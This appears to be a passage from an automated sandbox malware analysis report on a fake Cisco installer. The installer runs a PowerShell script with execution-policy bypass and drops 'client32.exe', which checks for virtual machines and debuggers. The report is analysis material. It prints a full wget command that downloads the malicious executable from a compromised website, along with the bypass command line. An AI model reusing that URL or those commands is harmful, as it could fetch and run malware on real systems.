                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpDropped PE file which has not been started: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-J44M9.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-84570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-85055
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-87699
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-87913
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decisiongraph_11-88071
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeEvaded block: after key decision
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-84681
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 5.8 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 1.2 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069C9912_2_11069C99
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 6084Thread sleep time: -64000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 5428Thread sleep time: -38700s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 6084Thread sleep time: -1912500s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689C3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 689C3226h11_2_689C3130
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,11_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,12_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,12_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,12_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,12_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,12_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,12_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,12_2_68C4CA9B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50B33
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4EFE1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50F84
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,12_2_68C4C775
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50702
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4F8B5
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,12_2_68C4DA38
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C17C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C17C6D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4FD86
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,12_2_68C4DF35
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C76C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,12_2_68C76C74
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 0000000C.00000003.69247612661.0000000000751000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000C.00000002.69248903801.0000000000754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: client32.exe, 0000000B.00000002.70083577485.000000000571F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70081065717.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.69437076663.000000000571F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare
                                  Source: wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000002.69329567486.0000000000636000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000003.69328469762.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: client32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-87516
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-87423
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end node
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1116A559 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110CFCF0 CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,11_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C76C74 VirtualProtect ?,-00000001,00000104,?12_2_68C76C74
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1108B300 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_1108B300
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11030B10 SetUnhandledExceptionFilter,11_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1116A559 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689D28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_689D28E1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11030B10 SetUnhandledExceptionFilter,12_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1116A559 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C00807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_68C00807
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C7ADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,12_2_68C7ADFC
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C7C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_68C7C16F

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,11_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110F410 GetKeyState,DeviceIoControl,keybd_event,11_2_1110F410
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe" Jump to behavior
                                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/ciscosetup.exe" > cmdline.out 2>&1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/ciscosetup.exe"
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/ciscosetup.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,11_2_1109DC20
                                  Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,11_2_11170208
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,11_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,11_2_11170499
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,11_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,11_2_11170106
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,11_2_111701AD
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,11_2_111703D9
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,11_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_689DFAE1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,12_2_1117053C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,12_2_11167B5E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_11170011
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,12_2_11170500
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: EnumSystemLocalesA,12_2_11170499
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,12_2_68C0888A
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,12_2_68C08468
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,12_2_68C065F0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,12_2_68C085AC
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,12_2_68C086E1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,12_2_68C0871C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: GetLocaleInfoW,strlen,12_2_68C7F0DB
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _getptd,GetLocaleInfoA,_stricmp,12_2_68C7F034
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,12_2_68C7F136
                                  Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpQueries volume information: C:\ VolumeInformationJump to behavior
